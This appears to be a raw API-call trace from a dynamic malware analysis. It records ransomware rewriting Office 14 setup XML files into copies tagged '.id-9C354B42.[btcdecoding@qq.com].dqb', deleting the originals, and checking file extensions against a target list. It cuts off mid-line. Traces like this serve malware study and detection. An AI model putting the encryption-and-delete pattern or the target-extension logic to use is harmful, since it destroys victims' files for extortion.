lstrlenW (lpString="AccessMUI.XML") returned 13 [0037.225] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0037.226] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=1349) returned 1 [0037.226] CloseHandle (hObject=0x190) returned 1 [0037.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml")) returned 0x20 [0037.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.226] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0037.226] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.226] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.226] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0037.226] GetLastError () returned 0x0 [0037.226] ReadFile (in: hFile=0x190, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x545, lpOverlapped=0x0) returned 1 [0037.234] WriteFile (in: hFile=0x1bc, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x550, lpOverlapped=0x0) returned 1 [0037.235] ReadFile (in: hFile=0x190, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.235] WriteFile (in: hFile=0x1bc, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xee, lpOverlapped=0x0) returned 1 [0037.235] SetEndOfFile (hFile=0x1bc) returned 1 [0037.235] CloseHandle (hObject=0x1bc) returned 1 [0037.236] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.236] SetEndOfFile (hFile=0x190) returned 1 [0037.237] CloseHandle (hObject=0x190) returned 1 [0037.237] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0037.237] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml")) returned 1 [0037.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.238] lstrlenW (lpString=".doc") returned 4 [0037.238] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.238] lstrlenW (lpString=".docx") returned 5 [0037.238] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0037.238] lstrlenW (lpString=".pdf") returned 4 [0037.238] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.238] lstrlenW (lpString=".xls") returned 4 [0037.238] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.238] lstrlenW (lpString=".xlsx") returned 5 [0037.238] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0037.238] lstrlenW (lpString=".ppt") returned 4 [0037.238] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.238] lstrlenW (lpString=".zip") returned 4 [0037.238] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.238] lstrlenW (lpString=".rar") returned 4 [0037.238] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.238] lstrlenW (lpString=".bz2") returned 4 [0037.238] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.238] lstrlenW (lpString=".7z") returned 3 [0037.238] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.238] lstrlenW (lpString=".dbf") returned 4 [0037.238] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.238] lstrlenW (lpString=".1cd") returned 4 [0037.238] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.238] lstrlenW (lpString=".jpg") returned 4 [0037.238] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.238] lstrlenW (lpString=".doc") returned 4 [0037.238] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.238] lstrlenW (lpString=".docx") returned 5 [0037.239] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0037.239] lstrlenW (lpString=".pdf") returned 4 [0037.239] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.239] lstrlenW (lpString=".xls") returned 4 [0037.239] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.239] lstrlenW (lpString=".xlsx") returned 5 [0037.239] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0037.239] lstrlenW (lpString=".ppt") returned 4 [0037.239] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.239] lstrlenW (lpString=".zip") returned 4 [0037.239] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.239] lstrlenW (lpString=".rar") returned 4 [0037.239] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.239] lstrlenW (lpString=".bz2") returned 4 [0037.239] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.239] lstrlenW (lpString=".7z") returned 3 [0037.239] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.239] lstrlenW (lpString=".dbf") returned 4 [0037.239] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.239] lstrlenW (lpString=".1cd") returned 4 [0037.239] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.239] lstrlenW (lpString=".jpg") returned 4 [0037.239] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.335] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0037.335] lstrlenW (lpString="SETUP.XML") returned 9 [0037.335] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0037.336] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=2624) returned 1 [0037.336] CloseHandle (hObject=0x174) returned 1 [0037.336] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml")) returned 0x20 [0037.336] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.336] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0037.336] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.337] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.337] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0037.337] GetLastError () returned 0x0 [0037.337] ReadFile (in: hFile=0x174, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0xa40, lpOverlapped=0x0) returned 1 [0037.338] WriteFile (in: hFile=0x1a4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xa50, lpOverlapped=0x0) returned 1 [0037.340] ReadFile (in: hFile=0x174, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.340] WriteFile (in: hFile=0x1a4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0037.340] SetEndOfFile (hFile=0x1a4) returned 1 [0037.340] CloseHandle (hObject=0x1a4) returned 1 [0037.341] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.341] SetEndOfFile (hFile=0x174) returned 1 [0037.342] CloseHandle (hObject=0x174) returned 1 [0037.342] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0037.342] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml")) returned 1 [0037.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.342] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.342] lstrlenW (lpString=".doc") returned 4 [0037.342] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.342] lstrlenW (lpString=".docx") returned 5 [0037.342] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0037.343] lstrlenW (lpString=".pdf") returned 4 [0037.343] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.343] lstrlenW (lpString=".xls") returned 4 [0037.343] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.343] lstrlenW (lpString=".xlsx") returned 5 [0037.343] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0037.343] lstrlenW (lpString=".ppt") returned 4 [0037.343] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.343] lstrlenW (lpString=".zip") returned 4 [0037.343] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.343] lstrlenW (lpString=".rar") returned 4 [0037.343] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.343] lstrlenW (lpString=".bz2") returned 4 [0037.343] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.343] lstrlenW (lpString=".7z") returned 3 [0037.343] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.343] lstrlenW (lpString=".dbf") returned 4 [0037.343] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.343] lstrlenW (lpString=".1cd") returned 4 [0037.343] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.343] lstrlenW (lpString=".jpg") returned 4 [0037.343] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.343] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.343] lstrlenW (lpString=".doc") returned 4 [0037.343] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.343] lstrlenW (lpString=".docx") returned 5 [0037.343] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0037.343] lstrlenW (lpString=".pdf") returned 4 [0037.343] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.343] lstrlenW (lpString=".xls") returned 4 [0037.344] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.344] lstrlenW (lpString=".xlsx") returned 5 [0037.344] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0037.344] lstrlenW (lpString=".ppt") returned 4 [0037.344] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.344] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.344] lstrlenW (lpString=".zip") returned 4 [0037.344] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.344] lstrlenW (lpString=".rar") returned 4 [0037.344] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.344] lstrlenW (lpString=".bz2") returned 4 [0037.344] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.344] lstrlenW (lpString=".7z") returned 3 [0037.344] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.344] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.344] lstrlenW (lpString=".dbf") returned 4 [0037.344] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.344] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.344] lstrlenW (lpString=".1cd") returned 4 [0037.344] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.344] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0037.344] lstrlenW (lpString=".jpg") returned 4 [0037.344] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.344] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0037.344] lstrlenW (lpString="ExcelMUI.XML") returned 12 [0037.344] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0037.345] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=1565) returned 1 [0037.345] CloseHandle (hObject=0x174) returned 1 [0037.345] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml")) returned 0x20 [0037.345] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.345] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0037.345] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.345] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.345] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0037.345] GetLastError () returned 0x0 [0037.345] ReadFile (in: hFile=0x174, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x61d, lpOverlapped=0x0) returned 1 [0037.347] WriteFile (in: hFile=0x1a4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x620, lpOverlapped=0x0) returned 1 [0037.347] ReadFile (in: hFile=0x174, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.348] WriteFile (in: hFile=0x1a4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0037.348] SetEndOfFile (hFile=0x1a4) returned 1 [0037.348] CloseHandle (hObject=0x1a4) returned 1 [0037.348] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.348] SetEndOfFile (hFile=0x174) returned 1 [0037.349] CloseHandle (hObject=0x174) returned 1 [0037.349] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0037.349] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml")) returned 1 [0037.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.350] lstrlenW (lpString=".doc") returned 4 [0037.350] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.350] lstrlenW (lpString=".docx") returned 5 [0037.350] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0037.350] lstrlenW (lpString=".pdf") returned 4 [0037.350] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.350] lstrlenW (lpString=".xls") returned 4 [0037.350] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.350] lstrlenW (lpString=".xlsx") returned 5 [0037.350] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0037.350] lstrlenW (lpString=".ppt") returned 4 [0037.350] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.350] lstrlenW (lpString=".zip") returned 4 [0037.350] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.350] lstrlenW (lpString=".rar") returned 4 [0037.350] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.350] lstrlenW (lpString=".bz2") returned 4 [0037.350] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.350] lstrlenW (lpString=".7z") returned 3 [0037.350] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.350] lstrlenW (lpString=".dbf") returned 4 [0037.350] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.350] lstrlenW (lpString=".1cd") returned 4 [0037.350] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.350] lstrlenW (lpString=".jpg") returned 4 [0037.350] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.351] lstrlenW (lpString=".doc") returned 4 [0037.351] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.351] lstrlenW (lpString=".docx") returned 5 [0037.351] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0037.351] lstrlenW (lpString=".pdf") returned 4 [0037.351] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.351] lstrlenW (lpString=".xls") returned 4 [0037.351] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.351] lstrlenW (lpString=".xlsx") returned 5 [0037.351] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0037.351] lstrlenW (lpString=".ppt") returned 4 [0037.351] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0037.351] lstrlenW (lpString=".zip") returned 4 [0037.351] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.351] lstrlenW (lpString=".rar") returned 4 [0037.351] 